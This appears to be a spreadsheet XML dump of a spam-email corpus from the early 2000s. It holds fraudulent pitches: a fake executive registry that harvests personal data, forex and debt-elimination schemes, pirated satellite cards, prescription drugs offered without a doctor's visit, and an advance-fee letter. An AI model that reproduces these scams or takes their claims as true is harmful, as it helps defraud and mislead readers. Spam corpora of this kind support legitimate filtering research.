so the instructor can travel free to the camp.WE HOPE YOU SHARE FAMS VISION BECAUSE WE NEED YOUR HELP.WHAT YOU CAN DO:Get involved and show your support for FAMS. As a not-for-profit entity,
FAMS needs your help. Your donation will be used to maintain this very
worthwhile cause. A financial contribution, donated land, boat or car
. WE CAN USE IT ALL.HELP FAMS, CALL TODAY! (9:00 to 5:00 Eastern) 407-949-9300To SUBSCRIBE to future announcements or to request additional information
CLICK HERE: mailto:comsat33@uol.com.mx?subject=INFO-FAMS
Please include your telephone # when responding by e-mail.If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FAMS.Please take the time to understand what we are doing at FAMS.ï¿½What we human beings are all living now, whether we are volunteers or not,
is an extraordinary but exceptionally dangerous adventure. And we have a
very small number of years left to fail or to succeed in providing a
sustainable future to our species.ï¿½ - Jacques-Yves Cousteau::::::::::::::::::::::::::::::::::::::::::::::::::::::::If you wish to be excluded from inclusion in any
future mailings, please use the link below
Mailto:bgtyu88@uol.com.co?subject=Exclude-FAMS</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a MIME Message------=_NextPart_000_007F_01BDF6C7.FABAC1B0
Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.FABAC1B0"------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable***** This is an HTML Message ! *****
------=_NextPart_001_0080_01BDF6C7.FABAC1B0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Executive Guild Membership
 ApplicationResponse-O-Matic FormDear Candidate,=A0 You have been selected as a potential candidate for a free listing in=A0&lt;=
br&gt;
 the  2001 Edition of the International Executive Guild Registry=2E=A0= 
 Please accept our congratulations for this coveted honor=2E=A0 As this edition is so important in view of the new millennium, the=A0= International Executive Guild Registry will be published in two different=
=A0
 formats; the searchable CD-ROM and the Online Registry=2E=A0 Since inclusion can be considered recognition of your career position=A0&lt;=
br&gt;
 and professionalism, each candidate is evaluated in keeping with high=A0&lt;=
br&gt;
 standards of individual achievement=2E In light of this, the Internationa=
l Executive
 Guild thinks that you may make an interesting biographical subject=2E=A0&lt;=
br&gt;
 We look forward to your inclusion and appearance in the International=A0&lt;=
br&gt;
 Executive Guild's Registry=2E Best wishes for your continued success=2E=A0=
 International Executive Guild=A0
 Listing Dept=2E=A0If you
 wish to be removed from our list, please submit
 your request
at the
 bottom of this email=2E
 &lt;!--
 function validate_form() {
   validity =3D true; // assume valid
   if (!check_empty(document=2Eform=2Ebusphone=2Evalue))
         { validity =3D false; alert('Day Time
 Phone field is empty!'); }
     if (validity)
         alert ("Thank you for your registration!
 "
                 + "Your form is now being passed
 to your browser's "
                 + "Mail Delivery Sub-System for
 NORMAL"
                 + " NON-ENCRYPTED email
 delivery=2E"
                 + "  All email addresses are
 removed from our system"
                 + " upon registration=2E  Please
 click OK to proceed");
   return validity;
 } function check_empty(text) {
   return (text=2Elength &gt; 0); // returns false if
 empty
 }
 // --&gt;
 International Executive Guild
Registration Form
(US and Canada
 Only)Please
 fill out this form if you would like to be
 included on The International
 Executive Guild, For accuracy and
 publication purposes, please
 complete and send this form at the earliest
 opportunity=2E There is no
 charge or obligation to be listed
 on The International Executive Guild=2EYour
 NameYour
 CompanyTitleAddressCityState
 or ProvinceCountry
USACanada
ZIP/Postal
 CodeDay
 Time Telephone
Home
 Phone(Not
 To Be Published)Email
TO
 HELP US IN CONSIDERING YOUR APPLICATION, PLEASE
 TELL US A LITTLE ABOUT
 YOURSELF=2E=2E=2E
Your
 Business
(Financial
 Svcs, Banking, Computer Hardware, Software, Professional Svcs,
 Chemicals,
 Apparel, Aerospace, Food, Government, Utility,
 etc=2E)
Type
 of Organization
(M=
fg,
 Dist/Wholesaler, Retailer, Law Firm,
Investment
 Bank, Commercial Bank, University,
Financial
 Consultants, Ad Agency, Contractor, Broker,
 etc=2E)Your
 Business Expertise(Corp=2EMgmt,
 Marketing, Civil Engineering,
Tax
 Law, Nuclear Physics, Database Development, Operations, Pathologist,
 Mortgage
 Banking, etc=2E)
Major
 Product Line
(Integrated
 Circuits, Commercial Aircraft, Adhesives, Cosmetics, Plastic Components,
 Snack Foods, etc=2E)
Note: Submitting this form= will
 be made by email, not by use ofÂ  www=2EÂ  Confirmation of its de=
livery
 is made by browsing your outgoing mail=2EThank
 you for filling in this form, we will contact you with more
 information=2E
List
 Removal
Click
 Here------=_NextPart_001_0080_01BDF6C7.FABAC1B0--------=_NextPart_000_007F_01BDF6C7.FABAC1B0--</t>
  </si>
  <si>
    <t xml:space="preserve">
 Untitled Document         Â        Volume Over 1.2 Trillion Dollars a Day Tap into the high-income       opportunity found in the World's largest financial       market. The Foreign Currency Markets      Discover how: $20,000 "properly positioned" in the Euro vs.               the US Dollar, on 12/13/00 could have returned $70,000 on 1/03/01 Learn how successful professional traders assisting you can potentially achieve double-digit monthly returns of 10-30% or more!  Click Here
   For              a Free Foreign Currency Trading Newsletter               and a comprehensive report on the foreign currency markets. Click on the link below.    Click Here    There is considerable exposure to risk in any Forex (FX) transaction. Before deciding to         participate in FX trading,you should carefully consider your         objectives, level of experience and risk appetite. Most importantly         don't invest money you can't afford to       lose. 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t>
  </si>
  <si>
    <t xml:space="preserve"> Untitled Document         Â        Volume Over 1.2 Trillion Dollars a Day Tap into the high-income       opportunity found in the World's largest financial       market. The Foreign Currency Markets      Discover how: $20,000 "properly positioned" in the Euro vs.               the US Dollar, on 12/13/00 could have returned $70,000 on 1/03/01 Learn how successful professional traders assisting you can potentially achieve double-digit monthly returns of 10-30% or more!  Click Here    For              a Free Foreign Currency Trading Newsletter               and a comprehensive report on the foreign currency markets. Click on the link below.    Click Here    There is considerable exposure to risk in any Forex (FX) transaction. Before deciding to         participate in FX trading,you should carefully consider your         objectives, level of experience and risk appetite. Most importantly         don't invest money you can't afford to       lose. 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t>
  </si>
  <si>
    <t xml:space="preserve"> Untitled Document         Â        Volume Over 1.2 Trillion Dollars a Day Tap into the high-income       opportunity found in the World's largest financial       market. The Foreign Currency Markets      Discover how: $20,000 "properly positioned" in the Euro vs.               the US Dollar, on 12/13/00 could have returned $70,000 on 1/03/01 Learn how successful professional traders assisting you can potentially achieve double-digit monthly returns of 10-30% or more!  Click Here
   For              a Free Foreign Currency Trading Newsletter               and a comprehensive report on the foreign currency markets. Click on the link below.    Click Here    There is considerable exposure to risk in any Forex (FX) transaction. Before deciding to         participate in FX trading,you should carefully consider your         objectives, level of experience and risk appetite. Most importantly         don't invest money you can't afford to       lose. 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t>
  </si>
  <si>
    <t xml:space="preserve"> Eliminate your credit card debt without filing bankruptcy!
 Are you tired of making minimum payments and barely getting by?
Are you drowning in debt? 
Are you ready for a change and some freedom?What will buying this package do for me?*It will terminate your credit card debt! 
(Major credit cards only - Not department store cards or gas cards)
*This covers cash advances!
*This covers unsecured loans as well!
*It will allow you to stop making monthly payments immediately! 
*It will empower you to take back the control of your life! 
 *Unlike bankruptcy this keeps your affairs completely private!
Only you, the creditors, and the credit bureau will know.However, you will not lose your home, or any other assets!*You will no longer be able to use those credit cards.
 The price of this package runs between $1750-$2450.
We accept all forms of payment and offer a guarantee too. This program has been used successfully for 7 years! For more information please call: 1-800-694-5144
 This works in the US ONLY!
To opt out of our mailing list simply reply to this email.
 Eliminate your credit card debt without filing bankruptcy!  Are you tired of making minimum payments and barely getting by?Are you drowning in debt? Are you ready for a change and some freedom?
</t>
  </si>
  <si>
    <t xml:space="preserve">
You have been specially selected to qualify for the following:Premium Vacation Package and Pentium PC Giveaway
To review the details of the please click on the link 
with the confirmation number below:http://wintrip.www78.cn4e.comConfirmation Number#Lh340
Please confirm your entry within 24 hours of receipt of this confirmation.Wishing you a fun filled vacation!
If you should have any additional questions or cann't connect to the site 
do not hesitate to contact me direct:
mailto:vacation@btamail.net.cn?subject=Help!</t>
  </si>
  <si>
    <t xml:space="preserve">
$10,000 INSTANT CREDIT
PRIORITY MESSAGE
RECEIVE 2 FREE AIRLINE TICKETS AND
THE CREDIT YOU DESERVE!GET AN UNSECURED
VISA - MASTERCARDYES! Even with bad credit - no credit.WE CAN SHOW YOU HOW TO GETInstant Online Credit Approval
With credit limits up to $10,000 
Interest Rates as Low as 0% 
Do you have good credit?You can transfer your high interest credit cards to a low 0% Dear Future Card HolderCLICK HERE
AND VISIT OUR SITE!
Start enjoying the Credit You Deserve..
</t>
  </si>
  <si>
    <t xml:space="preserve">
The Internet's Online PharmacyViagra - Xenical - Propecia - Claritin - Celbrex - Renova - ZybanNow get your prescriptions approved by a panel of licensed medical doctors online without the need for an office visit.After approval of the doctor the medication will be shipped right to your door.Visit The Internets Online Pharmacy by clicking the link below: http://host.1bulk-email-software.com/ch4/pharm/purple/To be removed from future mailings send an email to unlist4me@yahoo.com with remove in the subject</t>
  </si>
  <si>
    <t xml:space="preserve"> Take yourself out of our list BY CLICKING HERE
BORED 
              WITH 
              YOUR CELL PHONE? 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢
Get 
                      cool Songs &amp; Logos to your Phone today!
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢Â Â It's 
              real simple! No confusing downloads 
              or installations.Simple phone activation!Â â€¢ 
              â€¢ â€¢ Click Here to order 
              â€¢ â€¢ â€¢ 
There 
              are tons of songs and graphics to choose from.
              See a sample of some of the songs to choose from below:
Â 
Â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SmithÂ When 
              you are ready to order, justâ€¢â€¢â€¢â€¢â€¢click here!â€¢â€¢â€¢â€¢â€¢
and 
              we will deliver your new tunes or graphics 
              via satellite in under 5 minutes.
 Take yourself out of our list BY CLICKING HERE
</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</si>
  <si>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complete name removing system at website.
371812976544333222
</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</si>
  <si>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complete name removing system at website.
4924161298765444333</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</si>
  <si>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complete name removing system at website.
4924161298765444333
</t>
  </si>
  <si>
    <t xml:space="preserve"> Take yourself out of our list BY CLICKING HERE
BORED 
              WITH 
              YOUR CELL PHONE? 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢
Get 
                      cool Songs &amp; Logos to your Phone today!
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢Â Â It's 
              real simple! No confusing downloads 
              or installations.Simple phone activation!Â â€¢ 
              â€¢ â€¢ Click Here to order 
              â€¢ â€¢ â€¢ 
There 
              are tons of songs and graphics to choose from.
              See a sample of some of the songs to choose from below:
Â 
Â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SmithÂ When 
              you are ready to order, justâ€¢â€¢â€¢â€¢â€¢click here!â€¢â€¢â€¢â€¢â€¢
and 
              we will deliver your new tunes or graphics 
              via satellite in under 5 minutes.
 Take yourself out of our list BY CLICKING HERE
84221111000000</t>
  </si>
  <si>
    <t xml:space="preserve"> Take yourself out of our list BY CLICKING HERE
BORED 
              WITH 
              YOUR CELL PHONE? 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢
Get 
                      cool Songs &amp; Logos to your Phone today!
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ â€¢ 
                      â€¢ â€¢ â€¢ â€¢ â€¢ â€¢Â Â It's 
              real simple! No confusing downloads 
              or installations.Simple phone activation!Â â€¢ 
              â€¢ â€¢ Click Here to order 
              â€¢ â€¢ â€¢ 
There 
              are tons of songs and graphics to choose from.
              See a sample of some of the songs to choose from below:
Â 
Â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SmithÂ When 
              you are ready to order, justâ€¢â€¢â€¢â€¢â€¢click here!â€¢â€¢â€¢â€¢â€¢
and 
              we will deliver your new tunes or graphics 
              via satellite in under 5 minutes.
 Take yourself out of our list BY CLICKING HERE
24128644332</t>
  </si>
  <si>
    <t xml:space="preserve">695online The Nation Wide Low Cost Internet Provider
695 OnlineThe Nation Wide $6.95 A Month Dial-Up Internet
Paying High Prices for a Dial-Up Connection...!Only $6.95* Per Month
Most of us need a dial-up internet connection at some point. Maybe as a back up to our current high speed connection. Maybe when we travel, 
or maybe for everyday use. But like so many of us, paying $21 to $31 a month is just getting to be too much. Especially if you still find it hard
to get connected or hard to stay connected.
695Online is the perfect Dial-up service for you. $23.85Per Month$21.95Per Month$21.95Per MonthSteady and Reliable Connectivity 
Filters out unwanted emails 3 Email Addresses 
24/7 Unlimited Internet 
Affordable Price 
Comes with a CD packed with softwareGreat Service 
Easy to use 
Nation Wide Local Access Numbers
Only $6.95 Per Month* 
Learn MoreSign Up NOW...!Sign Up for 695online.com the Nation Wide Low Cost Internet Provider and get Mail-Block for FREE...!* Orders are billed for a minimum 3 month period. Sign Up NOW...and start Saving Money today...! If you do not wish to receive email for this service, please click 
REMOVE. 
</t>
  </si>
  <si>
    <t xml:space="preserve">STOP 
  PAYING FOR PORN
You will 
  be amazed how easy it is!!!! 
GETTING 
  FREE XXX PASSWORDS IS EASY,
  WE'LL SHOW YOU HOW!!!
CLICK 
  HERE 
  TO GET YOUR FREE PASSWORDS
Â Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â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24hours for removal.This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.
Â 
432114108765443333222222
</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</si>
  <si>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remove http://www.cs220.com/mortgage/remove.html
3015107654</t>
  </si>
  <si>
    <t xml:space="preserve"> Could you please send the address of your agent in Saudi Arabia.Thanks
Sathar</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246With our Pre-Programmed Satelite Cards get ALL channels
availible including ALL Pay-Per-View channels!!Never miss any of your favorite shows again!Our Pre-Programmed Access Cards work on ALL Satellite Systems!Our pre-programmed satellite cards are $329.00 and are
shipped FedEx 2-Day COD Delivery!Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
and a 24-hour tech support line available!Take your old card out, replace it with your new one
and receive everything available!  It's that easy!
-------------------------------------------------------------Order yours TODAY by calling 1-888-406-4246
This message will only be sent to you once. 
You will not receive any future updates.
Any questions please call 1-888-406-4246.
4405QbGO0-443kDbe8564dZal0-578oOQX1596BvIM5-482gIom4113Kxl54
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246With our Pre-Programmed Satelite Cards get ALL channels
availible including ALL Pay-Per-View channels!!Never miss any of your favorite shows again!Our Pre-Programmed Access Cards work on ALL Satellite Systems!Our pre-programmed satellite cards are $329.00 and are
shipped FedEx 2-Day COD Delivery!Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
and a 24-hour tech support line available!Take your old card out, replace it with your new one
and receive everything available!  It's that easy!
-------------------------------------------------------------Order yours TODAY by calling 1-888-406-4246
This message will only be sent to you once. 
You will not receive any future updates.
Any questions please call 1-888-406-4246.
1704xszn1-577ZfdS2166WWdp8-18l27
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">GET YOUR MERCHANT ACCOUNT
TODAY!
Approved
in 24 hours
Bad
Credit/No Credit - Not a Problem
VISA *
MASTERCARD * AMERICAN
EXPRESS * DISCOVER * ELECTRONIC CHECK
Â 
Click
here to visit our website.
In just one minute you can complete the request
form for your merchant account.
Â 
LOWER YOUR MERCHANT RATES
TODAY
we
offer the lowest rates in the industry!
START MAKING MONEY!
ONLINE, ON THE PHONE, IN YOUR STORE,
IN YOUR SHOP,Â  
FROM YOUR OFFICE OR HOME 
RIGHT AWAY! 
Â 
Click
here to visit our website.
In just one minute you can complete the request
form to receive a free statement analysis.
Â 
Â Â Â Â  Â 
DON'T WAIT ANOTHER DAY! 
Â INCREASE YOUR SALES BY
AS MUCH AS 1000%
Â get your address out of our list, directions for removal on web site.
33161186544333222
</t>
  </si>
  <si>
    <t>Have you checked your personal credit reports recently?If you are planning making any major purchase like purchasing a Home or
newcar or getting a new job or even a promotion, Please....read on!You need to have a GOOD to EXCELLENT credit rating.  If you do already,
that's important, but if you know your credit is less than perfect, you need
to get those negative remarks REMOVED, LEGALLY and quickly.How?  It's easier than you think.With NuCredit Software YOU can clear any negatives already on your
credit reports, This requires NO experience OR special skills from you to use our
program. This is how we can help:Getting "Excellent Credit" has never been easier athttp://wws2.dyn.eeFor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credit."We" will not clear your negative credit, but "you" can, and easily
too. You are not going to spend hundreds or even thousands of dollars to do
it,or depend on someone you don't even know to take action.If you can send an email, you can operate our software. It's just that
simple.This "Fast and easy-to-use" program is called, NuCredit.Here is a brief description:The easiest and most effective credit program available today.
NuCredit is designed to improve and remove negative items on
your personal credit reports at home or the office quickly and
effectively. This is your first step to achieving financial independence.NuCredit does it all "Step by Step"...Each easy-to-understand step
is designed to remove negative credit remarks on each of the major
credit bureau files, legally! Never before, has it been easier to
remove negative credit just like the professionals.This program is the complete route to getting, using, and managing your
credit reports wisely even if you're unskilled in credit or computers.
10 minutes a month is all you need to:Remove negative items from each credit report:TRW (Experian), TransUnion, CBI/EquifaxCommunicate with the credit bureaus without fear or reprisal.Review your credit reports on a consistent cycle (every 30 days!)Manage your own credit reports easily.Now "you" have control over your reports.Re-establish good credit, Fast and easy!"Please go to:http://wws2.dyn.eeLet's get started today!. Don't let another minute pass.To be removed click belowhttp://wws2.dyn.ee/remove.htm
[6897Xjvk9-144hsPG7837zbKJ3-198zOzv0155tGcO9-717sfou4155TgDj5-12@59]</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246With our Pre-Programmed Satelite Cards get ALL channels
availible including ALL Pay-Per-View channels!!Never miss any of your favorite shows again!Our Pre-Programmed Access Cards work on ALL Satellite Systems!Our pre-programmed satellite cards are $329.00 and are
shipped FedEx 2-Day COD Delivery!Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
and a 24-hour tech support line available!Take your old card out, replace it with your new one
and receive everything available!  It's that easy!
-------------------------------------------------------------Order yours TODAY by calling 1-888-406-4246
This message will only be sent to you once. 
You will not receive any future updates.
Any questions please call 1-888-406-4246.
022l3
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246With our Pre-Programmed Satelite Cards get ALL channels
availible including ALL Pay-Per-View channels!!Never miss any of your favorite shows again!Our Pre-Programmed Access Cards work on ALL Satellite Systems!Our pre-programmed satellite cards are $329.00 and are
shipped FedEx 2-Day COD Delivery!Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
and a 24-hour tech support line available!Take your old card out, replace it with your new one
and receive everything available!  It's that easy!
-------------------------------------------------------------Order yours TODAY by calling 1-888-406-4246
This message will only be sent to you once. 
You will not receive any future updates.
Any questions please call 1-888-406-4246.
1722uaWq6-181LTUG3901fJcv5-835bNAI2156DDPV1-l41
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Do you take credit cards?If you do you will make more money.  Easy set up..no credit checks - 100% approval....Make more money now!
TRY NOW
Remove info is found on web site</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. I meant to contact http://taint.org webmaster,
Am I correct, I hope?Actually, I am not quite sure... Did I or Natasha Fedorova write 
you before to your other address? Anyway, now I am here instead of 
her too.So, my name is Oksana Svetlova, I live in St. Petersburg, Russia.I have an idea, how we could cooperate to mutual benefit, see, 
possibly you will find it interesting.People are seeking to cut costs with this economy slow-down, right?The thing is that I could get you in touch with developers from
Russia, who will be happy to do a web designer's work for you for
considerably less, than you possibly take from your clients (or 
pay for web-design?), and with _professional_ quality. Also - all
programming, Internet-programming, graphic, flash design, content
writing, translations, etc. If you do web-design, then you may
accept more orders at once, getting a good share from each, and
devote yourself only to that work, you find most interesting.
Alternatively, you can realize more your ideas to develop, more
features to add to your existing sites, and with low costs: from
$12, and an average of $18 an hour.I have put links to their works at www.antee.com/samples_and_faq.htmlAs for reliability, I just saw, how carefully they hand-picked their
specialists, and under what tight management they do their projects.
So, from past experience, it was almost always possible to meet 
deadlines. Also, communication is properly thought-out: a consultant 
is online in ICQ and other instant messengers almost each day, also 
their company has local consultants in many states throughout the 
USA, in Europe and Australia.So, what do you think? A possibility for cooperation?Thank you very much,
Oksana Svetlova.
oksana@antee.comPS. Just in case you need any type of IT works now, please let me 
know a bit of details, they will return you a cost/time estimation.
</t>
  </si>
  <si>
    <t xml:space="preserve">*** Attention: US Citizens *** Earn extra money working at home in your spare time.The government needs your help!Become a mortgage refund tracer in a few easy steps.Millions of dollars are left to be distrubuted each year and each state government
pays tracers to help track down the poeple who are to receive the money owed to them
 It is the law that they must disperse the funds.We provide you with the tools and information necessary to make yourself thousands each month working from  the privacy of your own home.
Part time or full time - You spend as much or as little time as you want while helping your neighbors and the US government!Visit:  http://www3.sympatico.ca/mark.daisy/mortgage/
Don't miss this awesome opportunity! We are only making this information available to a limited number of citizens.
No risk to participate in this great program!!!
----------------------------------------------
Please note:. This is a one time mailing from our marketing department. We will not solicit any other offers.
126432211111
</t>
  </si>
  <si>
    <t xml:space="preserve">Traderlist.com is a fraud and is sending out your e-mail to 3rd parties!! With the help of an email extracting program anyone can get your email adress and home adress from scanning Traderlist.com.Traderlist.com is breach the Internet Privacy Act by adding your email adress and adress without the consent of the owner.We are working towards a class action law suit which will see Traderlist.com ordered to be shut down and pay a fine.If you are interested and would like to find out how Traderlist.com sends out your email and other personal information to 3rd parties just reply to this message.Regards,Jean McCart
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,
BRAND NAME PRODUCTS
Any brand name products you would like to buy or sell in volume? Please try us!!!
Union (since 1989) specialized in trading brand name products. We have very strong connection with every corner in worldwide and always can do something what others are not able to do specially in China market. 
We sell USD 10 million value products monthly and stock level is USD 3 million.
Product Range 
1) Computer/Office equipment Supplies
2) Computer Hardware
3) Copier/Fax/Printer
4) Stationery
5) Camera/Film/Battery/Photo Paper
6) Digital Video/Still Camera
7) Consumer Electronic Products
8) Video Games
9) Car Audio
10) Mobile Phone
For more details, please visit our visit website: http://www.unioncameraltd.com
Please also come back to us about your interests and let us know more about your current business.
Awaiting for your reply.
Best regards,
William Chao
Owner
We are pleased to invite you to visit our booth  
CEBIT 2002 HANNOVER
(Hall 25) Stand A64
March 13-20, 2002               
Union Camera Limited
http://www.unioncameraltd.com/
e-mail: unionc@unioncameraltd.com
address: 1812 Wu Sang House, 655 Nathan Rd.,Kln.,Hong Kong.
Tel: 852 23079338         Fax: 852 23873058
</t>
  </si>
  <si>
    <t xml:space="preserve">Finally: After 15 Years of Research and Development..A True WEIGHT LOSS Breakthrough Years Ahead of it's Time! SERIOUSLY: DEEP DOWN YOU KNOW THAT MILLIONAIRES ARE MADE BY GETTING INVOLVED IN OPPORTUNITIES BEFORE THE GENERAL PUBLIC FINDS OUT...HERE IS YOUR CHANCE TO GET INVOLVED WITH A PRODUCT THAT CAN LEAD TO SERIOUS, MONTHLY RESIDUAL INCOME (Do the work once and keep getting paid!)...FIND OUT WHY...FIND OUT HOW...NOW!Send a blank email with the words "SUBSCRIBE to T.E.D" in the subject area to:jmpro@hotpop.comThis is your first step towards working with a team of 7 figure income earners that can teach you how to do the same because of a proven system that will be customized for you!
mmuocfvfbxotxknbnbdytkwdbonvovyv
</t>
  </si>
  <si>
    <t>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</si>
  <si>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 xml:space="preserve">
Thank you for signing up for the Internationalfreecall.com mailing list.Soon we will show you how to make free international and free domestic phone calls.The information on making free international calls will come after a short series of emails, so please wait a couple of days for the series of emails to arrive.  In the meantime, you can always opt-out at any time by clicking on the unsubscribe link at the bottom of each message.In addition, for those who qualified for our promotion, we will show you how to receive 160 minutes of free domestic calling.Finally, for our customers who order a flat-rate calling product and wish to market this, or another one of their own businesses, I will give a free automated email follow-up system with no catches (this is a $20.00 value!)More to come soon. Stay tuned!http://www.internationalfreecall.comTo unsubscribe at any time, click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5576
</t>
  </si>
  <si>
    <t xml:space="preserve">
Thank you for signing up for the Internationalfreecall.com mailing list.Soon we will show you how to make free international and free domestic phone calls.The information on making free international calls will come after a short series of emails, so please wait a couple of days for the series of emails to arrive.  In the meantime, you can always opt-out at any time by clicking on the unsubscribe link at the bottom of each message.In addition, for those who qualified for our promotion, we will show you how to receive 160 minutes of free domestic calling.Finally, for our customers who order a flat-rate calling product and wish to market this, or another one of their own businesses, I will give a free automated email follow-up system with no catches (this is a $20.00 value!)More to come soon. Stay tuned!http://www.internationalfreecall.comTo unsubscribe at any time, click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5587
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello Unlimited International Telephone Call Marketer,If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on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1543
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello Unlimited International Telephone Call Marketer,If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on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1676
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello Unlimited International Telephone Call Marketer,If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on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1680
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,I found your opportunity posted at: 
http://iiu.taint.org/pipermail/iiu/2000-November/000644.htmlIf you want additional places to advertise your opportunity, plus get a free email follow-up system to process your replies, visit:http://www.newslist.netor just reply to this message.Note: You will automatically be removed from this list if you DO NOT reply to this message.  Replying will re-subscribe you to our marketing tips newsletter.info@newslist.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,I found your opportunity posted at: 
http://iiu.taint.org/pipermail/iiu/2000-November/000608.htmlIf you want additional places to advertise your opportunity, plus get a free email follow-up system to process your replies, visit:http://www.newslist.netor just reply to this message.Note: You will automatically be removed from this list if you DO NOT reply to this message.  Replying will re-subscribe you to our marketing tips newsletter.info@newslist.net
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello ~name~,If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on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5576
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello ~name~,If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on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5587
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello ~name~,If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:http://www.internationalfreecall.comIf you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.Please try dialing 1-866-865-4548.In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:1-410-608-8178# Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.If you have any questions, please contact us for more information.In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:http://www.internationalfreecall.comIn the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!For more information on OPEX, or to sign up, please click below:http://cognigen.net/opex/main.cgi?lietuvaTo unsubscribe from this mailing list, please click on:http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5590
</t>
  </si>
  <si>
    <t xml:space="preserve">If you are a time traveler or alien disguised as human and or have
the technology to travel physically through time I need your help!My life has been severely tampered with and cursed!!
I have suffered tremendously and am now dying!I need to be able to:Travel back in time.Rewind my life including my age back to 4.I am in very great danger and need this immediately!I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involves.I have a time machine now, but it has limited abilitys and is 
useless
without
a vortex.If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east-west polarized,
North-south polarized vortexexs are used for cross-dimensional 
time 
travel only.
Only if you have this technology and can help me exactly as 
mentioned
please send me a (SEPARATE) email to: IneedTimeTravel@aol.comPlease do not reply if your an evil alien!
Thanks
</t>
  </si>
  <si>
    <t xml:space="preserve">
MR. AYANDA MAREDI
DEPARTMENT OF MINERALS AND ENERGY
PRETORIA, SOUTH AFRICA.
Good morning,It is my great pleasure to write you this letter on behalf of my colleagues.
I venture to write to you perhaps you will see it fit to assist my
colleagues and I in all honesty as we attempt to seek your assistance.I have decided to seek a confidential co-operation with you in the execution
of a deal hereunder for the benefit of all parties and hope you will keep it
confidential because of the nature of this business.Within the Department of Minerals and Energy where I work as a Director
of Audit and Project implementation, with the co-operation of two other top officials, we
have in our possession an overdue payment in US funds.The said funds represent certain percentage of the contract value executed
on behalf of my Department by a foreign contracting firm, which we the officials over-invoiced to the
